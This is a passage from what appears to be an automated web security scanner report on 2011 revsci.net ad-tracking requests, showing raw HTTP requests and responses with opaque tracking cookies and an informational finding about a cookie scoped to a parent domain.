7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_oq-t="MLsXtSUNJjhvJpE4W8XcxPALFPJgPeDE7Ff6CLs1Rb8Vycmn5M/kolpihGBtP4qAsRpDY+d3v8wr0T6CFhR+NT4tc9m17i03au/YWlRiBwIrbPpAc8e2VDA3Fy0Vrmb4xZ22/TJRrsBbxPCqZATA815Vb6OrwpvJR+zQ8ZGFw9PDFcC/Y7PTOY5d9+q31SnL3BhA4vzoOB0Ekv8p3l8+pteiCTNytAVKFfDfJqeAcxwy8OHiGDkA3v65xcortoClA+NhmPj9YX6E2WnizVBjWuppNZQ6UmLs8BB3dO30OOHUbyZDEAHXRbLPrchyJp14Ka/P0Q5Kd9fCRzkUndIsGVnL/DI6nwaA8j3GpBOJ44nzIEvedkHNFJV/f70ZkVGEgJjFapsaCzfwoW82Z7YAQQbw+KUS4l4HxxAkhwO1JwKeXuaM2bpDyLwYbzinHTRxVBjmUAGY0FLmOkBe7WIWTvZ6LXxGgRSvEgkaAbAxomjwLonrZncXw5b5IOa0dW/+bDU5M/THVsim41xi/ZEXsslQnWa8xspgda0au6rBX9n9YaQ84slrTPonu++Jl44bzXZxVALRm2FDsuJTj4GsnM538a3ly2yg8SsVynV4fzLU1f1hjjJULtea1ZkpkC5gy8RxAc5BUp824xKxilSNJInpdBNGkLNYlOwej36iAzJkFLU+HByPgVhqXaFpXUiYlXhm/xp0WL+L9uhm77/sYv8jdEnAVyXVzCRAvQvw8s+exbHFnc8EjIddHJPhoCf8x/McHMY7i4eJaltPnaGzum2RFkrBaL3LQD4bwLTDLqt6likCL0eYmwJdTBkfiROrDj7zXxhCmIUuMdVVqJLkLzMtA7YqlSTXkioqFYbi0XAvyTP7xQhU/9W/jAvJpgjrRwupz1OICgoIuavwfKS+oDrw8FPgcgSq5ThjINf6ssaQ0w7RedrpyeHX18N7IMu15fksBQHc7KczG3YGe8fSuCc1qomDAbThH8pdqQr2ZPBlffPe4iHLoLaITsWD0hqHlNgYOsoaBKrkHTF9K/QBdRKh/Q3k5sgIIDBwFfIfEubP8z1F0WEKjeqlHHVhVC08/HcAzh3lp+L87xwXv12T3Oe7GJvw5puQER8wF5dFLxgJByT4wiNK+3RBJ0+8Zno7Mj70ShXCvoDYJO9viSdA4vbhGDYrVnqNxu2qWcDSmzi2koah7tNRK+brZPnynugQRPvjyE+Y60xVdWQIGp/c4jrzLKU245EtADE/BeE09F7uQnmFRG8pn4H6/K2JzEiScIFrmzck1dk8csnKw5pwYQVnO9a3xLuMRgjgYMV7Hl3/0nkP82nOF3w8i/F1P00S+yk9nFVCLxzvq9Lbi6dwWGbfww=="; rsi_us_1000000="pUM14ymnMBYY7dXKYa4+QBq0n9/GBbL4c0FLnOpZcOMWXfdIwqWgo6bEOShXLMkuGlR0wZegZgIWaKIbAt2HrtFsKbGpoCi9wa0pnmnV++4nDUcwbFT7BTwJlQNkxSfqk5EhERJiohDhufcOy3Id1igSTjWGWtFgOwRDxL6wisceGScbfetKK4BxmUo0Jf/6ggwMwCdr0RM7KzxbQPxF5AxySUvBIfftgLaEmSxXt16/t7NUl3b05qIiQxcDeOTdEefAXZ+srDdH6HKDIno8LnSqR4r8JIZavI6/Pqe5i2+QPndI6oUGSTSGOB6mSiq0G/9yS8n8fumcLKvtCiPQ8LYzowEtlpEFRKgp7YQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq85mn+ogNNpohJeiwnvSINazyaXJFrnBB4XAvdwG2Z2uDopXs+6cJD425zzdfEc0Uqi630rFPJZQpAjrujJLgwIQXJvj7hyy+h4NmblJMmsStCmpU96IUsi2WHeHHVdJbtczxxe9YtzqmlXJgOVW2N0OOtjRHHcGRgW+RjXOgjoj9reHSj9TjULa+Xs8m+6DqE2jShJj/S6XlMCOZSfM9h+VEkH88l0U0mKM5P66ZlCAAKli/8grUHMZTQX4Bv6NOwfVnSNo0/KxM4icXFieCOAbI0i5aq+r6P+bcXdAVA2x/LgfPKDxZWiVWRDieZC8DkArKot9dw2aj9Gup83hyklvQMLsOLsiKsoGEYLE0xAt8QYZ0TreTQ9H98Ag+EDE+jGpoyzSMCTBMG4Cg92RikJ9i90dX+IGDIzEyQmqvobggZ99Idp+nhfFJ1pTAAsohqJbyeArywu1Iw4enMLfyk9is7Vh8ZxqotJNjUgapMVE3ErspP7aG2+21oMep4eTN37ajU0lGxIwrZ1AUXQcVh3fuwCe7h3/b9tf7EQEP885pax2GfB1WT2QdegbRFaICdC+l/vKzbHrKq0VGMBifZSmcJO4CPCjVY//F9DAa8+m3o+aWkBghpmv/EL28I488TH7FzcWJHXuvpbQs6qk0sGGCL2Qm2G7jocOOpBHUBUB2HhPc31J7OThksnfG6M3RiPtJLoOhujmBo90PvjAr74jA4OKswU58YmejNhuHJZyzfY1ypfeMMKSvR5bLpHKHcOeRxC0H6+3mYrlTWoqRO5vF+mEJoeGJ2MSSXsQbGSROnsA+hnyGsPzo1R06r0XP/B86B/FAke53gUlWLQq8meSDh/1YfI9jwzlZ62xFkzUQo4nv3UYwSdPkGxLhJRvVODOO/zg0k2H2rMTE2MIP3Hg2d6bLlTIPKSp0S4fDgJqLoGboJuooDvLDIKDN67/AXrSRj2N4VlVNXV9EQSaOkht6r054i1/+ndkxLqqYmi1MHwprNIusVevkyBKdhSe07c60i1F0XKu2Vdvht6L/iGqz19nue3Z7xLH8NuacTm9qxpjMhx/Q7zD9eCbQy4Lo2ZtueYSKTE7VS36vSfGiQRYAbOnZoiZyjNHhENnQshw1OZFGwrFt0P+P7GxnXOiL+Lr3oEoXw0fS4GxCoxayOYwcOv5JguBAOkclUNVs30G1J0Nwhl5R2VpvFRnSVwcye4ROLj3PD+Nyp+CGdw3TVfuB8MogwXbd9CNubJLJt+BiykioKj2KSP60sXKWmkvfZmxUhK0hZWkmGTnM59nCDzc1/gDRdGBJJde5YaQIhdHGe1vh1xWmhYzo1fdkzzoQFhx0WqR00KV6rH9009+7sxUxkud964S1crRQvocbmbaLIO75XZHJIAeASbx/6g4="; rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNhqsMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpen5bmxx0VW/Fj5TEabvOAJFHZ1HkqHXXxqnjiC3oOweMZPSwkAJ20b/FZGDDHvWZWoQFYW/Bxx6OKyvNtqrQYP/DuRMuCpad6JLNu5xR3q3Nz7Qafk8Wq0LRY+14yoBM4tWDmrZdvSSuqy1TjL0tuKvI8mNIoh7KrEbQwnjBb1/LfBb8nXVzAZA1i6C8Xdm0cMC9LidpZlbEH3XMd5Xgw4jfPzI/b7RAI4gMLDLzP+SdEy0AQx9DXaeNTmC2s6HbnJgfP+I0tgk7tyNj/CzYfV5FHctMqOrpkDoPgnKfInXmzo8eN7M6w6+YxBKDqMIqbxukpogdBn+UtZBuolunW41Y23J+N63iY00FAXcAE73YN/Dql57qFUu6dll9801fT3qLLPaNP+b9FIoBf32eAwseHayTwczmXBz1WltFamSD3GIRixAc8atcD/KfEOirCTjLCfULuN/9O8loGQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kp+7NKotVmC6B0xoih8KOY2GgoDUHMLaF6Bd63X2lVVR6H9spRjI4FbNogsnrmd1Nb6qpiEPnmtStnvPL+ZHYhTdMJWQMP4bJ8NI8lb3ZqPJL0VV4AxaiAwL6eGmV5A9TFGc/tmK2wU5BZe4fCR0Dgju8cK4XB6lERNTZXxfcBhrADJYkSt7Dm6t76rF7GLRUdrdKIeG1Q3xoHA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:53:23 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:53:23 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.159. http://pix04.revsci.net/I10985/b3/0/3/1008211/47135208.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/47135208.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNhqsMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpen5bmxx0VW/Fj5TEabvOAJFHZ1HkqHXXxqnjiC3oOweMZHSvnrXbZhwnrg+Sti3jYa16vkgNMv8HjFHDQP/2HO42kRP80ce/k4WsU6sAiJISH2/r3PUaypbi/tEnX3NAxVJBIsGOZSzR3RzxPTgs1nQn1LBhYdUF376uHnA56pGp24XOD3JcIhDw8d59s8JqjhNmXwRXJJ48CbQDFR9cy7Ms7Wr21xeDzQz7bkPEsPq+xz5XLKjbPvWVHlEckSUWh3YwCmrlAv9RCj58g0lTP4pLvuCeK1RV+seBswg0K/TXQ8nu6PZVdN909hJu5E3Ssxo/ZDBnZ603pUglwBZNtps8MXjN8V1oGcp/Ol7HkTm5qzeShAm/6S2rtXzaEYwm3wefc3NAePEy2cUAH4mu25Cz/7xFtrTLDRXshiG7zkOhTXyWFMDmAv6yqFMJWypL5kg0W9n0hIkdKUZoFA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:43:03 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/47135208.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_GmIq="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpihPJ9WP6iKbjeS1EvCK92NbndGyqxdN5LT2U8DOmgVO/YIwtdemT1DUjfH8oh8yRi/RAd80bpK/lFDTj9A5kkDRuEN30YAuOhJs2CmOnGedOFqdCL19QBN4zoY1AzypDlSzvHNt3VJEpE4vyQOB0Ikv8p3p45ptfiCTJyNAZKFfD/JqeAExwy8NmcGDkA0f65xcortoClQ+NhmPj9YY6E2WnizVBjWuxpNZQqUmLscBF3dO30OuHUE+ZDEAHXRbLP7chyJp18Ka/PsQ5Kd9feRzkUndIsGV3L/DI6ngSA8s1GpBOJ48nzIKvedkHNFJ1vf70bkVGEmLjFapsKKzfwoW42Z7YDQQbwyKUS4l4HxxAkhx+1JwKeXuaM2bpDyKzYbzinHTRxVBDmUAG40FLmOkFe7aIXTvZ6LHxGgQSvEgkaAbAxImjwLgnqZncXz5b5IGa0dW/+bDU5M/THVsi221xi/ZETsskwnWa8xspgda3YvKrBP9n9YaQ84slrTPonu+yJl457zXZxVA7Rm2GjsuJTj5GsnM438a3lS22g8SsUynV4fTLU1Y1hjjK01taa1ZkpkC6Qy8RxAcZBUp8m4xKxinSNJAnodBNGkLNYlNAej36iAzJkFLM+HByvgVhqXadpXUiYhXhm/xp0WL+r9uhm77/uYv8jdEnAVyX